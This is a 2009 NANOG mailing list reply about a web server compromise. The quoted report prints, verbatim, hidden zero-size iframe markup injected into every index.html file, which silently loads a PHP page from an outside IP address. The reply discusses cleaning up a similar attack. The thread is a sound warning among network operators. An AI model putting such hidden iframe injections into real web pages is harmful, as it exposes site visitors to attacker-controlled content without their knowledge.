Malicious code just found on web server

Neil kngspook at gmail.com
Mon Apr 20 16:47:59 UTC 2009


On Fri, Apr 17, 2009 at 4:39 PM, Russell Berg <berg at wins.net> wrote:

> We just discovered what we suspect is malicious code appended to all
> index.html files on our web server as of the 11:00 central time hour today:
>
> src="http://77.92.158.122/webmail/inc/web/index.php"
> style="display: none;" height="0" width="0"></iframe>
> <iframe src="http://77.92.158.122/webmail/inc/web/index.php"
> style="display: none;" height="0" width="0"></iframe> </body> </html>
>
> IP address resolves to mail.yaris.com; couldn't find any A/V site
> references to this.
>
> Google search reveals some Chinese sites with references to the URL today,
> but nothing substantial in the translation.
>
> Just a heads up for folks; we have a team investigating...
>
> Russell Berg
> Dir - Product Development
> Airstream Communications
> berg at wins.net
> 715-832-3726
>
>
I've run into this sort of attack before, where they change the page to load
content from elsewhere; but I couldn't figure out how they managed to write
to the sites' pages.  They were hosted on a commercial webhost, and so if it
was a compromised host (which seemed like the only possibility to me), that
didn't speak well for the hosting company.

We were having issues with the company anyways, though; so I took down the
site, sanitized the pages (and removed a bunch of junk), and put the site
back up with another company.

But if you figure out how they got write access to a static website, I'd
love to hear it.

-N.



More information about the NANOG mailing list